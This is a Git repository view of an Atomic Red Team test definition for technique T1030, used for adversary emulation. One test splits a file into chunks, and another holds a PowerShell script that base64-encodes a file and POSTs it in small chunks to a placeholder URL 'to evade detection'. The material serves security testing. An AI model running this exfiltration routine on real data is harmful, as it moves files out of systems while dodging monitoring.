security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
master
atomic-red-team/atomics/T1030/T1030.yaml
T
Atomic Red Team GUID generator c09d2a3748 Generate GUIDs from job=generate-docs branch=master [skip ci]
2024-02-26 15:24:32 +00:00

66 lines
2.2 KiB
YAML
Raw Permalink Blame History

attack_technique: T1030
display_name: Data Transfer Size Limits
atomic_tests:
- name: Data Transfer Size Limits
auto_generated_guid: ab936c51-10f4-46ce-9144-e02137b2016a
description: |
Take a file/directory, split it into 5Mb chunks
supported_platforms:
- macos
- linux
input_arguments:
file_name:
description: File name
type: path
default: T1030_urandom
folder_path:
description: Path where the test creates artifacts
type: path
default: /tmp/T1030
dependency_executor_name: sh
dependencies:
- description: The file must exist for the test to run.
prereq_command: |
if [ ! -f #{folder_path}/#{file_name} ]; then exit 1; else exit 0; fi;
get_prereq_command: |
if [ ! -d #{folder_path} ]; then mkdir -p #{folder_path}; touch #{folder_path}/safe_to_delete; fi; dd if=/dev/urandom of=#{folder_path}/#{file_name} bs=25000000 count=1
executor:
command: |
cd #{folder_path}; split -b 5000000 #{file_name}
ls -l #{folder_path}
cleanup_command: |
if [ -f #{folder_path}/safe_to_delete ]; then rm -rf #{folder_path}; fi;
name: sh
- name: Network-Based Data Transfer in Small Chunks
auto_generated_guid: f0287b58-f4bc-40f6-87eb-692e126e7f8f
description: "Simulate transferring data over a network in small chunks to evade detection."
supported_platforms:
- "windows"
input_arguments:
source_file_path:
description: "Path to the source file to transfer."
type: path
default: "[User specified]"
destination_url:
description: "URL of the destination server."
type: url
default: "http://example.com"
chunk_size:
description: "Size of each data chunk (in KB)."
type: integer
default: 1024
executor:
name: powershell
elevation_required: false
command: |
$file = [System.IO.File]::OpenRead(#{source_file_path})
$chunkSize = #{chunk_size} * 1KB
$buffer = New-Object Byte[] $chunkSize
while ($bytesRead = $file.Read($buffer, 0, $buffer.Length)) {
$encodedChunk = [Convert]::ToBase64String($buffer, 0, $bytesRead)
Invoke-WebRequest -Uri #{destination_url} -Method Post -Body $encodedChunk
}
$file.Close()
Reference in New Issue View Git Blame Copy Permalink